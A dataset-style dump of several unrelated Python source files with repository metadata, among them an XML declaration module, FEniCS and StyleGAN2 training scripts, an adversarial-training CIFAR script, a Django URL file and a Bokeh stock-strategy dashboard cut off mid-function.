0639f377ef09cc9e3dd6e6c93f5186fac1220199
|
16e266cf50a712ed29a4097e34504aac0281e6cb
|
/Functions/venv/lib/python3.6/site-packages/_TFL/_SDG/_XML/Decl.py
|
cb6eb6e6326ae9e70cbb20696ef64a94226130af
|
[
"BSD-3-Clause"
] |
permissive
|
felix-ogutu/PYTHON-PROJECTS
|
9dd4fdcfff6957830587b64c5da3b5c3ade3a27e
|
8c1297dbda495078509d06a46f47dc7ee60b6d4e
|
refs/heads/master
| 2023-06-05T04:41:36.727376
| 2021-06-25T20:36:52
| 2021-06-25T20:36:52
| 380,348,911
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,927
|
py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2004 Mag. Christian Tanzer. All rights reserved
# Glasauergasse 32, A--1130 Wien, Austria. tanzer@swing.co.at
# ****************************************************************************
#
# This module is licensed under the terms of the BSD 3-Clause License
# <http://www.c-tanzer.at/license/bsd_3c.html>.
# ****************************************************************************
#
#++
# Name
# TFL.SDG.XML.Decl
#
# Purpose
# Model declarations of a XML document
#
# Revision Dates
# 27-Aug-2004 (CT) Creation
# 23-Jul-2007 (CED) Activated absolute_import
# 06-Aug-2007 (CED) Future import removed again
# 26-Feb-2012 (MG) `__future__` imports added
# ««revision-date»»···
#--
from __future__ import absolute_import, division, print_function, unicode_literals
from _TFL import TFL
import _TFL._SDG._XML.Element
class _Decl_ (TFL.SDG.XML.Leaf) :
front_args = ("name", "value")
init_arg_defaults = dict \
( name = None
, value = None
)
percent_head = ""
_xml_format_body = \
"""%(elem_type)s %(percent_head)s%(name)s %(::>.value:)s"""
xml_format = "".join (("<", _xml_format_body, " >"))
_autoconvert = dict \
( name = lambda s, k, v : s._checked_xml_name (v)
)
# end class _Decl_
class Attlist (_Decl_) :
"""Model an attribute list declaration of a XML document"""
elem_type = "!ATTLIST"
front_args = ("name", )
rest_args = "value"
# end class Attlist
class Element (_Decl_) :
"""Model an element type declaration of a XML document"""
elem_type = "!ELEMENT"
# end class Element
class Entity (_Decl_) :
"""Model an entity declaration of a XML document"""
elem_type = "!ENTITY"
# end class Entity
class Notation (_Decl_) :
"""Model a notation declaration of a XML document"""
elem_type = "!NOTATION"
# end class Notation
class Parameter_Entity (Entity) :
"""Model a parameter entity declaration of a XML document"""
percent_head = "%% "
# end class Parameter_Entity
class Unparsed_Entity (Entity) :
"""Model an unparsed entity declaration of a XML document"""
Ancestor = Entity
front_args = ("name", "value", "notation")
init_arg_defaults = dict \
( notation = None
)
xml_format = "".join \
( ("<", Ancestor._xml_format_body, " NDATA %(notation)s >")
)
_autoconvert = dict \
( notation = lambda s, k, v : s._checked_xml_name (v)
)
# end class Unparsed_Entity
Parameter = Parameter_Entity
Unparsed = Unparsed_Entity
if __name__ != "__main__" :
TFL.SDG.XML._Export_Module ()
### __END__ TFL.SDG.XML.Decl
|
[
"you@example.com"
] |
you@example.com
|
aec4c0897870b4d304099bc38e94fa771f6bef6e
|
e9b03fe553fb85f798d44607c57c43b3cb20dc50
|
/Exercícios/1177.py
|
56b4bf2b1f76f218ce22344d06ea4a2bcfd2f631
|
[
"MIT"
] |
permissive
|
aldemirneto/Exercicios-Uri
|
89cdebff9b1b02361a251dea83715d51e3ee44c3
|
f246f0d3f6f10b9039f12e1e2a50a107d0718000
|
refs/heads/main
| 2023-04-30T06:04:25.415709
| 2023-04-17T01:56:56
| 2023-04-17T01:56:56
| 337,760,942
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 193
|
py
|
c = int(input())
z = 0
lista = []
for i in range(0, 1000):
z = 0
while z < c:
lista.append(z)
z += 1
for c in range(0, 1000):
print('N[{}] = {}'.format(c, lista[c]))
|
[
"56364675+aldemirneto@users.noreply.github.com"
] |
56364675+aldemirneto@users.noreply.github.com
|
7f69ec9258351f20f71e5186e75a162a42c610fd
|
b33f0a4ce4f353203b0a5f47373943273a04dfd7
|
/homework/hw11/tests/stacks.py
|
c16ae0207a65a10713321d430c5f3fe568ba26c5
|
[] |
no_license
|
yngz/cs61a
|
113c210d8c6418e54a697c2ea1036845a6727abb
|
f0e62fb8ccfc36f3eac25ffca50799990c7f8060
|
refs/heads/master
| 2020-03-27T06:22:44.368193
| 2018-11-30T10:21:02
| 2018-11-30T10:21:02
| 146,101,319
| 34
| 47
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 640
|
py
|
test = {
'name': 'stack',
'points': 1,
'suites': [
{
'cases': [
{
'code': r"""
sqlite> SELECT * FROM stacks;
abraham, delano, clinton, barack|171
grover, delano, clinton, barack|173
herbert, delano, clinton, barack|176
fillmore, delano, clinton, barack|177
eisenhower, delano, clinton, barack|180
""",
'hidden': False,
'locked': False
}
],
'ordered': True,
'scored': True,
'setup': r"""
sqlite> .read hw11.sql
""",
'teardown': '',
'type': 'sqlite'
}
]
}
|
[
"yang0201@outlook.com"
] |
yang0201@outlook.com
|
5868b3f864520cc54cc9419431f75b323659fb85
|
457be849f07a095184513274650c2ea3d2e6ca34
|
/mixed_poisson/mp_train.py
|
a9312b33c542455eac156ced39286c6b07b4559f
|
[] |
no_license
|
MiroK/nn-stab-stokes
|
03f594afe277345ba43dea87b3a6a25586ddfa6c
|
2e8144c80639d3db4637009a245884ff985af347
|
refs/heads/master
| 2023-02-12T00:56:34.865307
| 2021-01-12T15:02:41
| 2021-01-12T15:02:41
| 312,362,391
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,307
|
py
|
from fenics import *
from fenics_adjoint import *
import ufl
from numpy.random import rand, seed
from mp_make_data import mixed_poisson
seed(21)
# Load observations
def train_mixed_poisson(data, W):
'''Fit data with state in W(ideally unstable)'''
# Define a neural network that will be added as a source term to the Stokes eqn
R = VectorFunctionSpace(mesh, "R", 0, dim=50)
W_1, W_2, b_1, W_3_1, W_3_2 = Function(R), Function(R), Function(R), Function(R), Function(R)
W_3 = as_vector([W_3_1, W_3_2])
R2 = VectorFunctionSpace(mesh, "R", 0, dim=2)
b_2 = Function(R2)
eps = 1e1
W_1.vector()[:] = eps*rand(R.dim())
W_2.vector()[:] = eps*rand(R.dim())
W_3[0].vector()[:] = eps*rand(R.dim())
W_3[1].vector()[:] = eps*rand(R.dim())
b_1.vector()[:] = eps*rand(R.dim())
b_2.vector()[:] = eps*rand(R2.dim())
def nn(u, p, v, q):
# return inner(grad(p), grad(q)) * dx, None, None
def sigma_(vec, func=ufl.tanh):
v = [func(vec[i]) for i in range(vec.ufl_shape[0])]
return ufl.as_vector(v)
relu = lambda vec: conditional(ufl.gt(vec, 0), vec, (ufl.exp(vec) - 1))
sigma = lambda vec: sigma_(vec, func=relu)#lambda x:x)
nn_p = dot(W_3, sigma(ufl.transpose(as_vector([W_1, W_2])) * u + b_1)) + b_2
#nn_q = dot(W_3, sigma(ufl.transpose(as_vector([W_1, W_2])) * grad(q) + b_1)) + b_2
return inner(nn_p, v)*dx, inner(nn_p, nn_p)*dx, nn_p
sigma0, u0 = data.split(deepcopty=True)
# Now solve the Stokes-NN forward problem
w, reg = mixed_poisson(W, u0, nn)
sigma_nn, u_nn = w.split(deepcopy=True)
plot(sigma_nn, "out/mp_sigma_nn0.png")
plot(u_nn, "out/mp_u_nn0.png")
J = assemble((data - w)**2*dx)
print(f"J={J}")
reg = 0
for W in [W_3, W_1, W_2, b_1, b_2]:
reg += 1e4*assemble(W**2*dx)
J += reg
print(f"reg={reg}")
Jhat = ReducedFunctional(J, [Control(W_1), Control(b_1), Control(W_2), Control(b_2), Control(W_3_1), Control(W_3_2)])
C_w = Control(w)
set_log_level(LogLevel.ERROR)
minimize(Jhat, tol=1e-200, options={"disp": True, "gtol": 1e-12, "maxiter": 20})
print("|U - d| = ", assemble(inner(C_w.tape_value() - data, C_w.tape_value() - data)*dx)**0.5)
sigma_nn, u_nn = C_w.tape_value().split(deepcopy=True)
File("out/mp_sigma_nn.pvd") << sigma_nn
File("out/mp_u_nn.pvd") << u_nn
File("out/mp_sigma0.pvd") << sigma0
File("out/mp_u0.pvd") << u0
return nn
# --------------------------------------------------------------------
if __name__ == '__main__':
from mp_make_data import make_data
import numpy as np
mesh = RectangleMesh(Point(0.1, 0.1), Point(1.1, 1.1), 16, 16)
elm = [VectorElement('Lagrange', triangle, 1),
FiniteElement('Discontinuous Lagrange', triangle, 0)]
W = FunctionSpace(mesh, MixedElement(elm))
sigma0, u0 = make_data()
elm = [FiniteElement('Raviart-Thomas', triangle, 1),
FiniteElement('Discontinuous Lagrange', triangle, 0)]
W = FunctionSpace(mesh, MixedElement(elm))
data = Function(W)
assign(data, [interpolate(sigma0, W.sub(0).collapse()),
interpolate(u0, W.sub(1).collapse())])
nn = train_mixed_poisson(data, W)
|
[
"miroslav.kuchta@gmail.com"
] |
miroslav.kuchta@gmail.com
|
55401ba77d9170cc2836d3e8762b6cb1243bc2fc
|
8ebc40cba9e1006ab28db457416f1ab8363af92c
|
/gym/version.py
|
595cfe2965b6dc3e897f62fd4e5357385eaf3494
|
[
"MIT"
] |
permissive
|
forschumi/gym
|
790e3c371827e744f4ac05ded95af867ee0c93a8
|
8a323c9479dd64335556b86daa9061e3cf539021
|
refs/heads/master
| 2022-06-20T15:55:32.689154
| 2022-06-04T18:28:31
| 2022-06-04T18:28:31
| 87,368,392
| 0
| 0
| null | 2017-04-06T00:22:59
| 2017-04-06T00:22:59
| null |
UTF-8
|
Python
| false
| false
| 19
|
py
|
VERSION = "0.24.0"
|
[
"noreply@github.com"
] |
forschumi.noreply@github.com
|
baf0311c9c14b3c8c0ff9ed4571b0a9b021aeb20
|
357ce78eb000741b1fa742a200190ead9c87b1b3
|
/backend/urls.py
|
7fc083a58cee6dc224d0bf1a310eb091d0bcd078
|
[] |
no_license
|
LeoKnox/adventure_django2
|
40426bb1195620fb972c102aba66b501042e2d33
|
e2491e847c386c6f541497eac768ab671fcf6c04
|
refs/heads/main
| 2023-06-10T04:09:13.043850
| 2021-06-22T03:18:43
| 2021-06-22T03:18:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,063
|
py
|
"""backend URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from rest_framework import routers
from room import views
router = routers.DefaultRouter()
router.register(r'rooms', views.RoomView, 'room')
urlpatterns = patterns(
'backend.views',
url(r'^$', 'home')
# api
url(r'^api/v1/rooms/$', 'room_collection'),
url(r'^api/v1/rooms/(?P<pk>[0-9]+)$', 'room_element')
)
|
[
"noreply@github.com"
] |
LeoKnox.noreply@github.com
|
ab6a83e15be5c2a3d2a2dc9622e05554ce0ecb03
|
d6aae799e18e907fb413b715200c7832252a87e5
|
/image-generation/stylegan2-cdc/main.py
|
5f404ba2dfa1415fb4068f35840173fd9c7c6b53
|
[
"BSD-3-Clause",
"MIT",
"LicenseRef-scancode-proprietary-license",
"Apache-2.0",
"CC-BY-NC-4.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
sony/nnabla-examples
|
0d0bbd5df3028996e790bcf07248fdb0932697d1
|
41f71faa6efff7774a76bbd5af3198322a90a6ab
|
refs/heads/master
| 2023-09-04T03:45:54.023899
| 2023-08-22T03:31:21
| 2023-08-22T03:31:21
| 109,625,584
| 308
| 108
|
Apache-2.0
| 2023-08-22T03:31:23
| 2017-11-05T23:30:40
|
Python
|
UTF-8
|
Python
| false
| false
| 5,169
|
py
|
# Copyright 2021 Sony Corporation.
# Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import nnabla as nn
from nnabla.ext_utils import get_extension_context
from nnabla.monitor import Monitor
from argparse import ArgumentParser
import time
from execution import *
common_utils_path = os.path.abspath(
os.path.join(os.path.dirname(__file__), '..', '..', 'utils'))
sys.path.append(common_utils_path)
from neu.yaml_wrapper import read_yaml, write_yaml
from neu.comm import CommunicatorWrapper
import shutil
def make_parser():
parser = ArgumentParser(description='StyleGAN2: Nnabla implementation')
parser.add_argument('--data', type=str, default='ffhq', choices=['ffhq'],
help='Model dataset')
parser.add_argument('--dataset_path', type=str, default='',
help='Path to dataset')
parser.add_argument('--few_shot', type=str, default='few_shot', choices=['few_shot', 'None'],
help='Model dataset')
parser.add_argument('--weights_path', type=str, default='../results/weights',
help='Path to trained model weights')
parser.add_argument('--results_dir', type=str, default='../results/images',
help='Path to save results')
parser.add_argument('--monitor_path', '-mp', type=str, default='../results/monitor',
help='Path to save results')
# # [few-shot learning]
parser.add_argument('--pre_trained_model', type=str, default='path to pre trained model',
help='Path to trained model weights')
parser.add_argument('--extension_module', type=str, default='cudnn',
help='Device context')
parser.add_argument('--device_id', type=str, default='0',
help='Device Id')
parser.add_argument('--img_size', type=int, default=256,
help='Image size to generate')
parser.add_argument('--batch_size', type=int, default=2,
help='Image size to generate')
parser.add_argument('--train', action='store_true', default=False,
help='Set this flag to start training')
parser.add_argument('--auto_forward', action='store_true', default=False,
help='Set this flag to execute in dynamic computation mode')
parser.add_argument('--dali', action='store_true', default=False,
help='Set this flag to use DALI data iterator')
parser.add_argument('--seed_1', type=list, default=[100, 101],
help='Seed values 1')
parser.add_argument('--seed_2', type=list, default=[102, 103],
help='Seed values 2')
parser.add_argument('--test', type=str, choices=['generate', 'latent_space_interpolation', 'style_mixing', 'latent_space_projection', 'ppl'], nargs='*',
help='Set this flag for testing')
parser.add_argument('--batch_size_A', type=int, default=3,
help='Only for style mixing: Batch size for style A')
parser.add_argument('--batch_size_B', type=int, default=3,
help='Only for style mixing: Batch size for style B')
parser.add_argument('--use_tf_weights', action='store_true', default=False,
help='Use TF trained weights converted to NNabla')
parser.add_argument('--img_path', type=str,
default='',
help='Image path for latent space projection')
return parser
if __name__ == '__main__':
parser = make_parser()
args = parser.parse_args()
config = read_yaml(os.path.join('configs', f'{args.data}.yaml'))
ctx = get_extension_context(args.extension_module)
nn.set_auto_forward(args.auto_forward or args.test)
comm = CommunicatorWrapper(ctx)
nn.set_default_context(ctx)
monitor = None
if comm is not None:
if comm.rank == 0:
monitor = Monitor(args.monitor_path)
start_time = time.time()
few_shot_config = None
if args.few_shot is not None:
few_shot_config = read_yaml(os.path.join(
'configs', args.few_shot + '.yaml'))
if args.train:
style_gan = Train(monitor, config, args, comm, few_shot_config)
if args.test:
style_gan = Evaluate(monitor, config, args, comm, few_shot_config)
if comm is not None:
if comm.rank == 0:
end_time = time.time()
training_time = (end_time-start_time)/3600
print('Total running time: {} hours'.format(training_time))
|
[
"Hua.Ding@sony.com"
] |
Hua.Ding@sony.com
|
f296a88317c734be6c382ba0af2406e75c4df68c
|
a9062f45d4dee34fff63750f63d1eedd83eb6dde
|
/gutenberg.py
|
3489a59dc7111bd0ab219e1726f013555e1173a5
|
[] |
no_license
|
rossjjennings/crypto
|
f61a881134712461ce33cbc92a5728f5e7a735af
|
630e67fde3242c5bb2331a738e55e735265a69eb
|
refs/heads/master
| 2023-03-19T21:53:02.918104
| 2023-03-11T04:09:09
| 2023-03-11T04:09:09
| 181,235,810
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,434
|
py
|
from collections import Counter
from glob import glob
from ruamel.yaml import YAML
yaml = YAML(typ='safe')
count = Counter()
bigrams = Counter()
initials = Counter()
finals = Counter()
for filename in glob('Gutenberg/txt/*.txt'):
with open(filename) as f:
text = f.read().replace('\n', ' ')
count += Counter(text)
bigrams += Counter(zip(text[:-1], text[1:]))
words = [word.strip(',;:-.!?()"') for word in text.split()]
initials += Counter(word[0] for word in words if len(word) > 0)
finals += Counter(word[-1] for word in words if len(word) > 0)
alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
all_letters = {k: count[k] + count[k.lower()] for k in alphabet}
initial_letters = {k: initials[k] + initials[k.lower()] for k in alphabet}
final_letters = {k: finals[k] + finals[k.lower()] for k in alphabet}
letter_bigrams = {l1 + l2: bigrams[(l1, l2)]
+ bigrams[(l1, l2.lower())]
+ bigrams[(l1.lower(), l2)]
+ bigrams[(l1.lower(), l2.lower())]
for l1 in alphabet for l2 in alphabet}
with open('all_counts.yml', 'w') as f:
yaml.dump(all_letters, f)
with open('inital_counts.yml', 'w') as f:
yaml.dump(initial_letters, f)
with open('final_counts.yml', 'w') as f:
yaml.dump(final_letters, f)
with open('bigram_counts.yml', 'w') as f:
yaml.dump(letter_bigrams, f)
|
[
"rossjjennings@gmail.com"
] |
rossjjennings@gmail.com
|
0056b21b1573a9f0a6d99520739148e135749f54
|
292080e4d88bb5e5b10fd9fd744ced8ce7578a03
|
/train_cifar_jiaming.py
|
bb6f733d169fa08b21e17ac60973caf8f151004a
|
[] |
no_license
|
KirinNg/Training_Framework
|
09a1ad0dc1f2425d70cd7a6519d4474786162edc
|
607b53ef461193abf96f7f6e65bc5ca69f64a82d
|
refs/heads/master
| 2022-02-23T23:30:27.527276
| 2019-09-08T17:38:24
| 2019-09-08T17:38:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,278
|
py
|
from utils import config, data_stream
from utils import utils
import os
import tensorflow as tf
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
Cifar_train_config = config.Cifar_config()
Cifar_common_trainer = utils.Common_Framework(utils.cifar_net, Cifar_train_config)
Cifar_common_trainer.bulid_net()
Cifar_datastream = data_stream.Cifar_datastream(Cifar_common_trainer.sess, Cifar_train_config.BATCH_SIZE)
Cifar_datastream_val = data_stream.Cifar_datastream(Cifar_common_trainer.sess, Cifar_train_config.BATCH_SIZE, "val")
def StepLL_for_this_statu(x, logits, origin_label, eps=0.05):
total_class_num = tf.shape(logits)[1]
ori_class = tf.argmax(origin_label, 1, output_type=tf.int32)
one_hot_class = tf.one_hot((ori_class + 1)//total_class_num, total_class_num)
cross_entropy = tf.losses.softmax_cross_entropy(one_hot_class,
logits,
label_smoothing=0.1,
weights=1.0)
x_adv = x - eps * tf.sign(tf.gradients(cross_entropy, x)[0])
x_adv = tf.clip_by_value(x_adv, -1.0, 1.0)
return tf.stop_gradient(x_adv), one_hot_class
attack_op = StepLL_for_this_statu(Cifar_common_trainer.image_input_placehoder,
Cifar_common_trainer.logits,
Cifar_common_trainer.label_input_placehoder)
for e in range(Cifar_train_config.epoch):
for s in range(Cifar_train_config.step_per_epoch):
image_batch, label_batch = Cifar_datastream.get_one_batch(Cifar_common_trainer.sess)
# get attacked img
new_batch = Cifar_common_trainer.sess.run(attack_op, feed_dict=Cifar_common_trainer.get_feed(image_batch, label_batch, "att"))
_acc, cls_loss, l2 = Cifar_common_trainer.train(new_batch[0], new_batch[1])
if (s + 1) % 20 == 0:
val_image_batch, val_label_batch = Cifar_datastream_val.get_one_batch(Cifar_common_trainer.sess)
val_acc = Cifar_common_trainer.get_acc(val_image_batch, val_label_batch)
print("CLS_LOSS:{:.3f}, L2:{:.3f}, ACC:{:.4f}, EPOCH:{}, STEP:{}, val_ACC:{:.3f}".format(cls_loss, l2, _acc, e, s, val_acc))
Cifar_common_trainer.save("models/COM_Cifar.ckpt")
|
[
"kirinng0709@gmail.com"
] |
kirinng0709@gmail.com
|
cd3be5b331a4be5e57dc845d57e4f00222dda992
|
4c267509c3cc6bdce102811480d135ad817dad4d
|
/srv/main.py
|
5fa73cb43b02f578785a6074013e650c71cf4c0f
|
[
"MIT"
] |
permissive
|
varturas/PnlAITk
|
2aba552ca4d147a1167dd077537837e709148711
|
72a19f253d1abd4e35fb48da137bacd69b53f179
|
refs/heads/main
| 2023-04-07T07:47:01.282114
| 2021-04-21T20:04:57
| 2021-04-21T20:04:57
| 360,289,281
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,251
|
py
|
import sys,os
from lib.Portfolio import *
import traceback
import logging as log
import os.path,math
import html
from bokeh.layouts import row,column,layout,widgetbox
from bokeh.models import Button,ColumnDataSource,Span,Label,OpenURL,Paragraph
from bokeh.models.widgets import TextInput,DataTable,TableColumn,Div,DateFormatter,NumberFormatter,Paragraph,DatePicker
from bokeh.models.widgets import Select
from bokeh.models import Range1d, LinearAxis
from bokeh.plotting import figure,curdoc
from datetime import datetime as DT
from datetime import date, timedelta
import numpy as np
log.getLogger().setLevel(log.WARN)
#log.getLogger().setLevel(log.DEBUG)
portX = None
# page elements
ww=700
hh=70
symBox = TextInput(title="Pick a Symbol and date range", value='BTCUSD', height=hh)
todayDate = DT.today().date()
nDaysAgo = 200
datePick1=DatePicker(title='start date',min_date=date(2005,3,23),max_date=date(2022,12,31),value=todayDate-timedelta(days=nDaysAgo),height=hh)
datePick2=DatePicker(title='end date',min_date=date(2005,3,23),max_date=date(2022,12,31),value=todayDate,height=hh)
submit1 = Button(label='Submit',width=20,height=100)
stratBox = Select(title="Alpha",value='WMA',options=['BuyAndHold','RSI'],width=20)
buyPriceBox = Select(title="Buy Price",value='close',options=['open','close'])
buyQtyBox = TextInput(title="Buy Quantity", value='1', height=hh)
buyCondBox = TextInput(title="Buy Condition", value='', height=hh)
sellPriceBox = Select(title="Sell Price",value='close',options=['open','close'])
sellQtyBox = TextInput(title="Sell Quantity", value='1', height=hh)
sellCondBox = TextInput(title="Sell Condition", value='', height=hh)
submit2 = Button(label='Submit',width=20,height=hh)
#errBox = Div(text="",width=ww,height=hh//2,style={'overflow-y':'scroll','height':'150px'})
errBox = Div(text="",width=ww,height=hh//2)
lineSrc = ColumnDataSource(data={'date':[],'close':[]})
sellSrc = ColumnDataSource(data={'x':[],'y':[]})
buySrc = ColumnDataSource(data={'x':[],'y':[]})
alphaSrc = ColumnDataSource(data={'date':[],'alpha':[]})
retPlot = figure(plot_width=250,plot_height=100,x_axis_type='datetime', y_axis_label='price')
#retPlot.extra_y_ranges['alpha'] = Range1d(start=-10, end=100)
#retPlot.add_layout(LinearAxis(y_range_name='alpha', axis_label='alpha'), 'right')
p1 = Paragraph(text="A table below shows performance of trading algorithms for chosen symbols.",width=ww,height=hh//2)
p2 = Paragraph(text="In this section you can customize parameters of a chosen strategy. First choose a strategy from a dropdown, then change parameters in the input forms and save. The strategy will show up as \"Custom\" in a summary table. Note that Save button only available for logged in and registered users.", width=int(1.2*ww),height=hh//2)
p3 = Paragraph(text="A graph below displays a price of a chosen stock symbol (tanned line), alongside with alpha for a chosen strategy (in orange). Buy trades are shown as blue upward triangles, and sale trades are red downward triangles.", width=int(1.2*ww),height=hh//2)
emptyResult = dict(name=[],pnl=[],cnt=[])
summaryTableSource = ColumnDataSource(data=emptyResult)
summaryColumns = [
TableColumn(field='name',title='Name',width=120),
TableColumn(field='pnl',title='P&L',formatter=NumberFormatter(format='0.00%',text_align='right'),width=80),
TableColumn(field='cnt',title='Count',formatter=NumberFormatter(format='0,0',text_align='right'),width=80)
]
summaryTbl = DataTable(source=summaryTableSource,columns=summaryColumns,width=ww,height=200)
account = None
save1 = Button(label='Save',width=20,height=hh)
class Args:
def __init__(self,args=None):
log.debug('init Args')
self.args = args
# actions
def lookupRecs1():
sym = symBox.value
errBox.text = 'Done'
return lookupRecs(sym,"NA")
def lookupRecs2():
sym = symBox.value
customStrat = {'alphaName':stratBox.value, 'buyCondition': buyCondBox.value, 'buyPrice': buyPriceBox.value, 'buyQuantity': buyQtyBox.value, 'sellCondition': sellCondBox.value, 'sellPrice': sellPriceBox.value, 'sellQuantity': sellQtyBox.value }
customStratText = '[STRATEGY],'+','.join(['{}={}'.format(kk,vv) for kk,vv in customStrat.items()])
log.warn(customStratText)
errBox.text = html.escape(customStratText)
#return lookupRecs(sym,"NA")
return lookupRecs(sym,customStratText)
def lookupRecs(sym=None, custom=None):
global retPlot,lineSrc,sellSrc,buySrc,alphaSrc,portX
summaryTableSource.data = emptyResult
lineSrc.data = dict(date=[],close=[])
dt1 = datePick1.value
dt2 = datePick2.value
Dates,df = [],None
if dt1: Dates.append(dt1)
if dt2: Dates.append(dt2)
# create portfolio
args = Args()
args.view = None; args.force = True
args.backtest = custom
args.dates = Dates
args.Syms = args.Sym = symBox.value
if account: args.account = account
portX = PNLPortfolios(args)
portDF = portX.getPortDF()
iStrat = portDF.index[portDF['name']!='Custom'][0] # get 1st match other than Custom
if custom == "NA":
stratName1 = portDF.iloc[iStrat]['name']
stratBox.value = stratName1
else: stratName1 = stratBox.value
Sym1 = portDF.iloc[iStrat]['sym']
strat1 = portX.getStrategy(name=stratName1)
buyCondBox.value = strat1.buyCondition
sellCondBox.value = strat1.sellCondition
if portDF is None or not isinstance(portDF, pd.DataFrame) or portDF.empty:
errBox.text = error = "Cannot find any results, try again..."
return
df = portX.getDF(Sym=Sym1)
df['alpha'] = strat1.getAlpha()
if df is None or not isinstance(df, pd.DataFrame) or df.empty:
errBox.text = error = "Cannot find any graph data, try again..."
tDF = portX.getTrades(Sym=Sym1)
DT1 = DT(dt1.year,dt1.month,dt1.day) - timedelta(days=2)
DT2 = DT(dt2.year,dt2.month,dt2.day) + timedelta(days=1)
subDF = df.loc[(df['date'] > DT1.date()) & (df['date'] <= DT2.date())]
tradeDF = tDF.loc[(tDF['date'] > DT1.date()) & (tDF['date'] <= DT2.date()) & (tDF['quantity']!=0)]
minI,maxI = None,None
closes = subDF['close'].tolist()
if len(closes): minI,maxI = min(closes),max(closes)
lineSrc.data = subDF[['date','close']].to_dict('list')
alphaSrc.data = subDF[['date','alpha']].to_dict('list')
lastDate = tradeDF.date.max()
idx_cond = tradeDF.groupby("stratName").apply(lambda x,DT1: x.where((x.date==lastDate)&(x.quantity!=0)&(x.action.replace('force_close','').replace(',','')!='')).last_valid_index(),DT1=lastDate)
if not idx_cond.empty:
actDF = tradeDF.loc[tradeDF.index.intersection(idx_cond)]
actDF['now']='-'
actDF.loc[actDF.quantity>0,'now'] = 'up'
actDF.loc[actDF.quantity<0,'now'] = 'down'
actDF.loc[actDF.stratName=='BuyAndHold','now'] = 'hold'
actDF = actDF.rename(columns={'stratName':'name'})
portDF = pd.merge(portDF, actDF[['name','now']], left_on=['name'], right_on=['name'], how='left')
portDF[['now']] = portDF[['now']].fillna('-')
else:
portDF['now'] = '-'
summaryTbl.columns = []
portDF = portDF[['name','pnl','sharpe','sym','days','cnt','now']]
portDF = portDF.rename(columns={'pnl':'return'})
for col1 in [col1 for ii,col1 in enumerate(portDF)]:
if portDF[col1].dtype==np.float64:
if col1=='return':
summaryTbl.columns.append(TableColumn(field=col1, title=col1, formatter=NumberFormatter(format='0[.]00%',text_align='right')))
else:
summaryTbl.columns.append(TableColumn(field=col1, title=col1, formatter=NumberFormatter(format='0[.]00',text_align='right')))
else:
summaryTbl.columns.append(TableColumn(field=col1, title=col1))
summaryTableSource.data = portDF.to_dict('list')
sellData = tradeDF.loc[tradeDF['quantity']<0]
buyData = tradeDF.loc[tradeDF['quantity']>0]
if not stratName1 in ['_BuyAndHold_']:
sellData = sellData.loc[sellData['stratName']==stratName1]
buyData = buyData.loc[buyData['stratName']==stratName1]
sellSrc.data = dict(x=sellData['date'].tolist(),y=sellData['price'].tolist())
buySrc.data = dict(x=buyData['date'].tolist(),y=buyData['price'].tolist())
retPlot.line(x='date',y='close',line_color='tan',source=lineSrc,name='bench')
retPlot.triangle(x='x',y='y',size=7,fill_color='lightskyblue',source=buySrc,name='trades')
retPlot.inverted_triangle(x='x',y='y',size=7,fill_color='red',source=sellSrc,name='trades')
aMin,aMax = subDF.alpha.min(),subDF.alpha.max()
if False and aMin and aMax and not math.isnan(aMin):
retPlot.extra_y_ranges['alpha'].start = aMin
retPlot.extra_y_ranges['alpha'].end = aMax
retPlot.line(x='date',y='alpha',line_color='orange',y_range_name='alpha',source=alphaSrc,name='alpha')
retPlot.x_range.start,retPlot.x_range.end=DT1.timestamp()*1000,DT2.timestamp()*1000
def saveStrat():
if not account:
errBox.text = 'Cannot save without account info'
return None
else:
errBox.text = 'Saving custom strategy to '+ account
customStrat = {'alphaName':stratBox.value, 'buyCondition': buyCondBox.value, 'buyPrice': buyPriceBox.value, 'buyQuantity': buyQtyBox.value, 'sellCondition': sellCondBox.value, 'sellPrice': sellPriceBox.value, 'sellQuantity': sellQtyBox.value }
customStratText = '[STRATEGY],'+','.join(['{}={}'.format(kk,vv) for kk,vv in customStrat.items()])
log.warn('saving ' + customStratText)
errBox.text = 'Saving to '+ account + ' ' + html.escape(customStratText)
portX.setStrategy(account)
def populateParams(attr, old, new):
strat1 = portX.getStrategy(name=stratBox.value)
buyCondBox.value = strat1.buyCondition
buyPriceBox.value = strat1.buyPrice
buyQtyBox.value = strat1.buyQuantity
sellCondBox.value = strat1.sellCondition
sellPriceBox.value = strat1.sellPrice
sellQtyBox.value = strat1.sellQuantity
lookupRecs2()
sym_overlay = row(symBox, datePick1, datePick2, column(Div(),submit1,height=hh),height=hh)
#strat_overlay = row(stratBox, column(Div(),submit2,height=hh),height=hh)
buy_overlay = row(buyCondBox,buyPriceBox,buyQtyBox,stratBox)
sell_overlay = row(sellCondBox,sellPriceBox,sellQtyBox,column(Div(),save1,height=hh))
#err_overlay = row(column(row(save1, errBox)))
err_overlay = row(errBox)
# assemble the page
def assemble_page():
curdoc().clear()
l1 = layout([ \
